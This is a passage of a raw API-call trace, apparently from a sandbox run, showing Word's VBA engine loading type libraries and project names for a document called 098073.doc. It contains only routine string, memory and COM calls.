[0030.477] _wfullpath (in: _Buffer=0x2e7670, _Path="Normal", _BufferCount=0x104 | out: _Buffer="C:\\Users\\aETAdzjz\\Desktop\\Normal") returned="C:\\Users\\aETAdzjz\\Desktop\\Normal" [0030.477] lstrcmpiW (lpString1="C:\\Users\\aETAdzjz\\Desktop\\Normal", lpString2="") returned 1 [0030.477] SysStringByteLen (bstr="潎浲污") returned 0x6 [0030.477] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7667e38, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0030.477] SysStringByteLen (bstr="潎浲污") returned 0x6 [0030.477] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7667e38, cbMultiByte=7, lpWideCharStr=0x7667aa8, cchWideChar=7 | out: lpWideCharStr="Normal") returned 7 [0030.477] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Normal", cchWideChar=-1, lpMultiByteStr=0x2e7770, cbMultiByte=128, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Normal", lpUsedDefaultChar=0x0) returned 7 [0030.477] lstrlenA (lpString="Normal") returned 6 [0030.477] IsCharAlphaA (ch=84) returned 1 [0030.477] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e7a20, cbMultiByte=-1, lpWideCharStr=0x93b7ca0, cchWideChar=13 | out: lpWideCharStr="ThisDocument") returned 13 [0030.477] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ThisDocument") returned 0x109e3c [0030.477] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e7a20, cbMultiByte=-1, lpWideCharStr=0x93b7ca0, cchWideChar=13 | out: lpWideCharStr="ThisDocument") returned 13 [0030.477] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ThisDocument", cchWideChar=13, lpMultiByteStr=0x2e7820, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ThisDocument", lpUsedDefaultChar=0x0) returned 13 [0030.477] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ThisDocument") returned 0x109e3c [0030.477] lstrlenA (lpString="ThisDocument") returned 12 [0030.478] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e7a20, cbMultiByte=-1, lpWideCharStr=0x2e7880, cchWideChar=13 | out: lpWideCharStr="ThisDocument") returned 13 [0030.478] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ThisDocument", cchWideChar=13, lpMultiByteStr=0x2e74a0, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ThisDocument", lpUsedDefaultChar=0x0) returned 13 [0030.478] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ThisDocument") returned 0x109e3c [0030.478] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ThisDocument", cchWideChar=13, lpMultiByteStr=0x2e75e0, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ThisDocument", lpUsedDefaultChar=0x0) returned 13 [0030.478] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ThisDocument") returned 0x109e3c [0030.478] IMalloc:Alloc (This=0x7fefe015380, cb=0x80) returned 0x7838590 [0030.478] IMalloc:GetSize (This=0x7fefe015380, pv=0x7838590) returned 0x80 [0030.478] IMalloc:Alloc (This=0x7fefe015380, cb=0xb8) returned 0xb51df40 [0030.478] IMalloc:Alloc (This=0x7fefe015380, cb=0xb8) returned 0xb51de80 [0030.478] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ThisDocument", cchWideChar=13, lpMultiByteStr=0x2e74a0, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ThisDocument", lpUsedDefaultChar=0x0) returned 13 [0030.478] CoCreateGuid (in: pguid=0x2e71d0 | out: pguid=0x2e71d0*(Data1=0x5b0a4895, Data2=0x9b14, Data3=0x4c2e, Data4=([0]=0x87, [1]=0x50, [2]=0xa2, [3]=0xb6, [4]=0x8, [5]=0x3, [6]=0x15, [7]=0x7e))) returned 0x0 [0030.478] CoCreateGuid (in: pguid=0x2e71e0 | out: pguid=0x2e71e0*(Data1=0x8b36c8e, Data2=0xc696, Data3=0x4164, Data4=([0]=0x97, [1]=0x52, [2]=0x94, [3]=0x2a, [4]=0xc8, [5]=0xa, [6]=0x60, [7]=0x20))) returned 0x0 [0030.478] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ThisDocument", cchWideChar=13, lpMultiByteStr=0x2e71f0, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ThisDocument", lpUsedDefaultChar=0x0) returned 13 [0030.478] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ThisDocument") returned 0x109e3c [0030.478] GetLocalTime (in: lpSystemTime=0x2e70c8 | out: lpSystemTime=0x2e70c8*(wYear=0x7e1, wMonth=0x8, wDayOfWeek=0x4, wDay=0x11, wHour=0xd, wMinute=0x35, wSecond=0x21, wMilliseconds=0x16c)) [0030.478] _ultow_s (in: _Value=0x5b6852dd, _Buffer=0xb52c4c4, _BufferCount=0x9, _Radix=16 | out: _Buffer="5b6852dd") returned 0x0 [0030.478] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="095b6852dd", cchWideChar=11, lpMultiByteStr=0x2e7060, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="095b6852dd", lpUsedDefaultChar=0x0) returned 11 [0030.478] IMalloc:Alloc (This=0x7fefe015380, cb=0x170) returned 0xb4f3cc0 [0030.478] IMalloc:Alloc (This=0x7fefe015380, cb=0x50) returned 0x78096c0 [0030.478] strcpy_s (in: _Dst=0x78031a0, _DstSize=0xd, _Src="ThisDocument" | out: _Dst="ThisDocument") returned 0x0 [0030.478] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ThisDocument") returned 0x109e3c [0030.478] wcscpy_s (in: _Destination=0xb52c4d8, _SizeInWords=0xd, _Source="ThisDocument" | out: _Destination="ThisDocument") returned 0x0 [0030.478] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ThisDocument") returned 0x109e3c [0030.478] wcscpy_s (in: _Destination=0xb52c4f8, _SizeInWords=0xd, _Source="ThisDocument" | out: _Destination="ThisDocument") returned 0x0 [0030.478] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ThisDocument") returned 0x109e3c [0030.478] IMalloc:Alloc (This=0x7fefe015380, cb=0x30) returned 0x76dad40 [0030.478] IMalloc:Free (This=0x7fefe015380, pv=0x7809660) [0030.478] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7667a10 [0030.478] IMalloc:Free (This=0x7fefe015380, pv=0x76dad40) [0030.478] IMalloc:Alloc (This=0x7fefe015380, cb=0x3d0) returned 0xb524250 [0030.478] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7667a10 [0030.479] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb490bb0 [0030.479] IMalloc:Alloc (This=0x7fefe015380, cb=0x80) returned 0x7838620 [0030.479] IMalloc:Alloc (This=0x7fefe015380, cb=0x0) returned 0xb4f6220 [0030.479] IMalloc:Alloc (This=0x7fefe015380, cb=0x0) returned 0xb4f6210 [0030.479] wcsncpy_s (in: _Destination=0x2e6f20, _SizeInWords=0x108, _Source="*\\CNormal", _MaxCount=0x106 | out: _Destination="*\\CNormal") returned 0x0 [0030.479] CharLowerBuffW (in: lpsz="*\\CNormal", cchLength=0x9 | out: lpsz="*\\cnormal") returned 0x9 [0030.479] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cnormal", cchWideChar=10, lpMultiByteStr=0x2e6e50, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cnormal", lpUsedDefaultChar=0x0) returned 10 [0030.479] _wcsicmp (_String1="*\\CNormal", _String2="*\\CNormal") returned 0 [0030.479] IMalloc:Alloc (This=0x7fefe015380, cb=0x688) returned 0xb5026c0 [0030.479] IMalloc:Alloc (This=0x7fefe015380, cb=0x80) returned 0x78386b0 [0030.479] IMalloc:Alloc (This=0x7fefe015380, cb=0x640) returned 0xb502d50 [0030.479] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x76679b0 [0030.479] IMalloc:Alloc (This=0x7fefe015380, cb=0x0) returned 0xb4f6250 [0030.479] IMalloc:Alloc (This=0x7fefe015380, cb=0x0) returned 0xb4f6380 [0030.479] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7667830 [0030.479] IMalloc:Alloc (This=0x7fefe015380, cb=0x80) returned 0x7838740 [0030.479] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_Evaluate") returned 0x10d918 [0030.479] strcpy_s (in: _Dst=0x2e70f0, _DstSize=0xa, _Src="_Evaluate" | out: _Dst="_Evaluate") returned 0x0 [0030.479] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e70f0, cbMultiByte=10, lpWideCharStr=0x2e6f40, cchWideChar=10 | out: lpWideCharStr="_Evaluate") returned 10 [0030.479] IUnknown:AddRef (This=0x782a220) returned 0x4 [0030.479] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="_Evaluate", lHashVal=0x10d918, pfName=0x2e7010, pBstrLibName=0x2e6f40 | out: pfName=0x2e7010*=0, pBstrLibName=0x2e6f40) returned 0x0 [0030.479] IUnknown:Release (This=0x782a220) returned 0x3 [0030.479] IUnknown:AddRef (This=0x731da90) returned 0x6 [0030.479] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="_Evaluate", lHashVal=0x10d918, pfName=0x2e7010, pBstrLibName=0x2e6f40 | out: pfName=0x2e7010*=0, pBstrLibName=0x2e6f40) returned 0x0 [0030.479] IUnknown:Release (This=0x731da90) returned 0x5 [0030.479] IUnknown:AddRef (This=0x731cc80) returned 0x6 [0030.479] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="_Evaluate", lHashVal=0x10d918, pfName=0x2e7010, pBstrLibName=0x2e6f40 | out: pfName=0x2e7010*=0, pBstrLibName=0x2e6f40) returned 0x0 [0030.479] IUnknown:Release (This=0x731cc80) returned 0x5 [0030.480] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7667890 [0030.480] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7667b00 [0030.480] wcsncpy_s (in: _Destination=0x2e7160, _SizeInWords=0x108, _Source="*\\CNormal", _MaxCount=0x106 | out: _Destination="*\\CNormal") returned 0x0 [0030.480] CharLowerBuffW (in: lpsz="*\\CNormal", cchLength=0x9 | out: lpsz="*\\cnormal") returned 0x9 [0030.481] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cnormal", cchWideChar=10, lpMultiByteStr=0x2e7090, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cnormal", lpUsedDefaultChar=0x0) returned 10 [0030.481] _wcsicmp (_String1="*\\CNormal", _String2="*\\CNormal") returned 0 [0030.481] CExposedDocFile::CreateStream () returned 0x0 [0030.481] IMalloc:Alloc (This=0x7fefe015380, cb=0x420) returned 0xb4dbcd0 [0030.481] CExposedStream::AddRef () returned 0x2 [0030.481] CExposedStream::Release () returned 0x1 [0030.481] CExposedStream::Release () returned 0x0 [0030.481] IMalloc:Free (This=0x7fefe015380, pv=0xb4dbcd0) [0030.481] CExposedDocFile::AddRef () returned 0x3 [0030.492] LoadTypeLib (in: szFile="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL", pptlib=0x2e7ac8*=0x0 | out: pptlib=0x2e7ac8*=0x7829f50) returned 0x0 [0030.492] LoadTypeLib (in: szFile="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL", pptlib=0x2e7758*=0x0 | out: pptlib=0x2e7758*=0x7829f50) returned 0x0 [0030.492] ITypeLib:RemoteGetDocumentation (in: This=0x7829f50, index=-1, refPtrFlags=0x2e7778, pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0030.492] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Office", cchWideChar=7, lpMultiByteStr=0x2e7660, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Office", lpUsedDefaultChar=0x0) returned 7 [0030.492] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Office") returned 0x107515 [0030.492] IUnknown:QueryInterface (in: This=0x7829f50, riid=0x7fee3a76290*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e7638 | out: ppvObject=0x2e7638*=0x0) returned 0x80004002 [0030.493] GetLocalTime (in: lpSystemTime=0x2e74e0 | out: lpSystemTime=0x2e74e0*(wYear=0x7e1, wMonth=0x8, wDayOfWeek=0x4, wDay=0x11, wHour=0xd, wMinute=0x35, wSecond=0x21, wMilliseconds=0x17b)) [0030.493] wcsncpy_s (in: _Destination=0x2e7190, _SizeInWords=0x108, _Source="*\\CNormal", _MaxCount=0x106 | out: _Destination="*\\CNormal") returned 0x0 [0030.493] CharLowerBuffW (in: lpsz="*\\CNormal", cchLength=0x9 | out: lpsz="*\\cnormal") returned 0x9 [0030.493] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cnormal", cchWideChar=10, lpMultiByteStr=0x2e70c0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cnormal", lpUsedDefaultChar=0x0) returned 10 [0030.493] _wcsicmp (_String1="*\\CNormal", _String2="*\\CNormal") returned 0 [0030.493] GetLocalTime (in: lpSystemTime=0x2e7380 | out: lpSystemTime=0x2e7380*(wYear=0x7e1, wMonth=0x8, wDayOfWeek=0x4, wDay=0x11, wHour=0xd, wMinute=0x35, wSecond=0x21, wMilliseconds=0x17b)) [0030.493] wcsncpy_s (in: _Destination=0x2e7030, _SizeInWords=0x108, _Source="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc", _MaxCount=0x106 | out: _Destination="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc") returned 0x0 [0030.493] CharLowerBuffW (in: lpsz="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc", cchLength=0x27 | out: lpsz="*\\cc:\\users\\aetadzjz\\desktop\\098073.doc") returned 0x27 [0030.493] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cc:\\users\\aetadzjz\\desktop\\098073.doc", cchWideChar=40, lpMultiByteStr=0x2e6f60, cbMultiByte=80, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cc:\\users\\aetadzjz\\desktop\\098073.doc", lpUsedDefaultChar=0x0) returned 40 [0030.493] _wcsicmp (_String1="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc", _String2="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library") returned -4 [0030.493] _wcsicmp (_String1="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc", _String2="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc") returned 0 [0030.493] IUnknown:QueryInterface (in: This=0x7829f50, riid=0x7fee3a76290*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e7568 | out: ppvObject=0x2e7568*=0x0) returned 0x80004002 [0030.493] ITypeLib:RemoteGetLibAttr (in: This=0x7829f50, ppTLibAttr=0x2e7560, pDummy=0x10 | out: ppTLibAttr=0x2e7560, pDummy=0x10) returned 0x0 [0030.493] ITypeLib:RemoteGetDocumentation (in: This=0x7829f50, index=-1, refPtrFlags=0x0, pBstrName=0x2e7558, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x100000000 | out: pBstrName=0x2e7558*="Microsoft Office 16.0 Object Library", pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x100000000) returned 0x0 [0030.493] StringFromGUID2 (in: rguid=0x7667e30*(Data1=0x2df8d04c, Data2=0x5bfa, Data3=0x101b, Data4=([0]=0xbd, [1]=0xe5, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x44, [6]=0xde, [7]=0x52)), lpsz=0x2e7580, cchMax=39 | out: lpsz="{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}") returned 39 [0030.493] _ultow_s (in: _Value=0x2, _Buffer=0x2e74ca, _BufferCount=0x10, _Radix=16 | out: _Buffer="2") returned 0x0 [0030.493] _ultow_s (in: _Value=0x8, _Buffer=0x2e74ce, _BufferCount=0xe, _Radix=16 | out: _Buffer="8") returned 0x0 [0030.493] _ultow_s (in: _Value=0x0, _Buffer=0x2e74d2, _BufferCount=0xc, _Radix=16 | out: _Buffer="0") returned 0x0 [0030.493] wcscpy_s (in: _Destination=0x7822c38, _SizeInWords=0x95, _Source="*\\G" | out: _Destination="*\\G") returned 0x0 [0030.493] wcscpy_s (in: _Destination=0x7822c3e, _SizeInWords=0x92, _Source="{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}" | out: _Destination="{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}") returned 0x0 [0030.493] wcscpy_s (in: _Destination=0x7822c8a, _SizeInWords=0x6c, _Source="#2.8#0#" | out: _Destination="#2.8#0#") returned 0x0 [0030.493] wcscpy_s (in: _Destination=0x7822c98, _SizeInWords=0x65, _Source="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL" | out: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL") returned 0x0 [0030.493] wcscpy_s (in: _Destination=0x7822d18, _SizeInWords=0x25, _Source="Microsoft Office 16.0 Object Library" | out: _Destination="Microsoft Office 16.0 Object Library") returned 0x0 [0030.493] ITypeLib:LocalReleaseTLibAttr (This=0x7829f50) returned 0x0 [0030.493] wcscpy_s (in: _Destination=0xb52c518, _SizeInWords=0x95, _Source="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library" | out: _Destination="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library") returned 0x0 [0030.493] ITypeLib:RemoteGetDocumentation (in: This=0x7829f50, index=-1, refPtrFlags=0x2e7678, pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x1 | out: pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x1) returned 0x0 [0030.493] SysStringLen (param_1="Office") returned 0x6 [0030.493] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Office", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0030.493] SysStringLen (param_1="Office") returned 0x6 [0030.493] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Office", cchWideChar=7, lpMultiByteStr=0x7667f28, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Office", lpUsedDefaultChar=0x0) returned 7 [0030.493] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Office") returned 0x107515 [0030.493] strcpy_s (in: _Dst=0x2e7470, _DstSize=0x7, _Src="Office" | out: _Dst="Office") returned 0x0 [0030.493] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e7470, cbMultiByte=7, lpWideCharStr=0x2e72c0, cchWideChar=7 | out: lpWideCharStr="Office") returned 7 [0030.493] IUnknown:AddRef (This=0x782a220) returned 0x4 [0030.493] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="Office", lHashVal=0x107515, pfName=0x2e7390, pBstrLibName=0x2e72c0 | out: pfName=0x2e7390*=0, pBstrLibName=0x2e72c0) returned 0x0 [0030.493] IUnknown:Release (This=0x782a220) returned 0x3 [0030.493] IUnknown:AddRef (This=0x731da90) returned 0x8 [0030.493] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="Office", lHashVal=0x107515, pfName=0x2e7390, pBstrLibName=0x2e72c0 | out: pfName=0x2e7390*=0, pBstrLibName=0x2e72c0) returned 0x0 [0030.493] IUnknown:Release (This=0x731da90) returned 0x7 [0030.493] IUnknown:AddRef (This=0x731cc80) returned 0x6 [0030.494] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="Office", lHashVal=0x107515, pfName=0x2e7390, pBstrLibName=0x2e72c0 | out: pfName=0x2e7390*=0, pBstrLibName=0x2e72c0) returned 0x0 [0030.494] IUnknown:Release (This=0x731cc80) returned 0x5 [0030.494] IMalloc:Alloc (This=0x7fefe015380, cb=0x3c) returned 0xb4e37b0 [0030.494] IMalloc:Free (This=0x7fefe015380, pv=0x7773ba0) [0030.494] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x76676e0 [0030.494] IMalloc:Free (This=0x7fefe015380, pv=0xb4e37b0) [0030.494] wcsncpy_s (in: _Destination=0x2e7270, _SizeInWords=0x108, _Source="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", _MaxCount=0x106 | out: _Destination="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library") returned 0x0 [0030.494] CharLowerBuffW (in: lpsz="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", cchLength=0x94 | out: lpsz="*\\g{2df8d04c-5bfa-101b-bde5-00aa0044de52}#2.8#0#c:\\program files\\common files\\microsoft shared\\office16\\mso.dll#microsoft office 16.0 object library") returned 0x94 [0030.494] IMalloc:Alloc (This=0x7fefe015380, cb=0x12a) returned 0xb45ef00 [0030.494] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\g{2df8d04c-5bfa-101b-bde5-00aa0044de52}#2.8#0#c:\\program files\\common files\\microsoft shared\\office16\\mso.dll#microsoft office 16.0 object library", cchWideChar=149, lpMultiByteStr=0xb45ef00, cbMultiByte=298, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\g{2df8d04c-5bfa-101b-bde5-00aa0044de52}#2.8#0#c:\\program files\\common files\\microsoft shared\\office16\\mso.dll#microsoft office 16.0 object library", lpUsedDefaultChar=0x0) returned 149 [0030.494] IMalloc:Free (This=0x7fefe015380, pv=0xb45ef00) [0030.494] wcscpy_s (in: _Destination=0xb533178, _SizeInWords=0x95, _Source="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library" | out: _Destination="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library") returned 0x0 [0030.494] wcsncpy_s (in: _Destination=0x2e72b0, _SizeInWords=0x108, _Source="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", _MaxCount=0x106 | out: _Destination="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library") returned 0x0 [0030.494] CharLowerBuffW (in: lpsz="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", cchLength=0x94 | out: lpsz="*\\g{2df8d04c-5bfa-101b-bde5-00aa0044de52}#2.8#0#c:\\program files\\common files\\microsoft shared\\office16\\mso.dll#microsoft office 16.0 object library") returned 0x94 [0030.494] IMalloc:Alloc (This=0x7fefe015380, cb=0x12a) returned 0xb45ef00 [0030.494] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\g{2df8d04c-5bfa-101b-bde5-00aa0044de52}#2.8#0#c:\\program files\\common files\\microsoft shared\\office16\\mso.dll#microsoft office 16.0 object library", cchWideChar=149, lpMultiByteStr=0xb45ef00, cbMultiByte=298, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\g{2df8d04c-5bfa-101b-bde5-00aa0044de52}#2.8#0#c:\\program files\\common files\\microsoft shared\\office16\\mso.dll#microsoft office 16.0 object library", lpUsedDefaultChar=0x0) returned 149 [0030.494] IMalloc:Free (This=0x7fefe015380, pv=0xb45ef00) [0030.494] wcsncpy_s (in: _Destination=0x2e7270, _SizeInWords=0x108, _Source="*\\CNormal", _MaxCount=0x106 | out: _Destination="*\\CNormal") returned 0x0 [0030.494] CharLowerBuffW (in: lpsz="*\\CNormal", cchLength=0x9 | out: lpsz="*\\cnormal") returned 0x9 [0030.494] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cnormal", cchWideChar=10, lpMultiByteStr=0x2e71a0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cnormal", lpUsedDefaultChar=0x0) returned 10 [0030.494] _wcsicmp (_String1="*\\CNormal", _String2="*\\CNormal") returned 0 [0030.494] IUnknown:AddRef (This=0x7829f50) returned 0x4 [0030.494] IUnknown:QueryInterface (in: This=0x7829f50, riid=0x7fee3a764b8*(Data1=0xcacc1e8a, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e7698 | out: ppvObject=0x2e7698*=0x0) returned 0x80004002 [0030.494] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Office", cchWideChar=7, lpMultiByteStr=0x2e7660, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Office", lpUsedDefaultChar=0x0) returned 7 [0030.494] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Office") returned 0x107515 [0030.494] SysStringByteLen (bstr="潎浲污") returned 0x6 [0030.494] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x76676e8, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0030.494] SysStringByteLen (bstr="潎浲污") returned 0x6 [0030.494] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x76676e8, cbMultiByte=7, lpWideCharStr=0x7667f28, cchWideChar=7 | out: lpWideCharStr="Normal") returned 7 [0030.495] IMalloc:Alloc (This=0x7fefe015380, cb=0xa8) returned 0xb4c70d0 [0030.495] IMalloc:Alloc (This=0x7fefe015380, cb=0x7f40) returned 0xb5033a0 [0030.495] IMalloc:Alloc (This=0x7fefe015380, cb=0x30) returned 0x76db2c0 [0030.495] IMalloc:Alloc (This=0x7fefe015380, cb=0x60) returned 0x7773c80 [0030.504] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ThisDocument") returned 0x109e3c [0030.505] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ThisDocument", cchWideChar=13, lpMultiByteStr=0x2e78e0, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ThisDocument", lpUsedDefaultChar=0x0) returned 13 [0030.505] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="ThisDocument") returned 0x109e3c [0030.505] IMalloc:Alloc (This=0x7fefe015380, cb=0x38) returned 0x76db300 [0030.505] qsort (in: _Base=0x76db300, _NumOfElements=0x7, 